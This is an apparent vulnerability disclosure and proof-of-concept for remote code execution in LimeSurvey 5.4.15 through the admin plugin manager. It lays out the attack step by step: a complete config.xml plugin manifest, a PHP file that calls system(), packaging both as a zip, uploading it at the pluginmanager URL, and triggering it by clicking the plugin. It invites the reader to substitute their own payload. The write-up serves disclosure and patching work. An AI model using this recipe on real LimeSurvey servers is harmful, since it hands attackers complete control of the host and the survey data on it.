LimeSurvey-5.4.15-PluginUploadtoRCE
In LimeSurvey-5.4.15, it has a vulnerability in index.php/admin/pluginmanager which can lead to RCE
Impact: Complete control of the system.
The directory structure of the files we need is as follows:
Here are the attack steps:
- Create a config.xml as follows, and remember the name->exp:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<metadata>
<name>exp</name>
<type>plugin</type>
<creationDate>2021-11-18</creationDate>
<lastUpdate>2021-11-23</lastUpdate>
<author>Denis Chenu (for Respondage)</author>
<authorUrl>https://www.respondage.nl</authorUrl>
<supportUrl>https://www.limesurvey.org</supportUrl>
<version>0.2.1</version>
<license>GNU General Public License version 3 or later</license>
<description><![CDATA[Expression Script: make answer option text available; see settings for documentation and usage.]]></description>
</metadata>
<compatibility>
<version>5.0</version>
</compatibility>
<updaters disabled="disabled">
</updaters>
</config>
- Create a php file with the same name(exp) exp.php and fill your payload, like the following example:
<?php
system('calc');
?>
-
Compress config.xml and exp.php into one compressed package like exp.zip:
-
Upload this exp.zip file in /index.php/admin/pluginmanager?sa=index :
- Finally, when you click the plugin that uploaded, the php payload will be triggered:



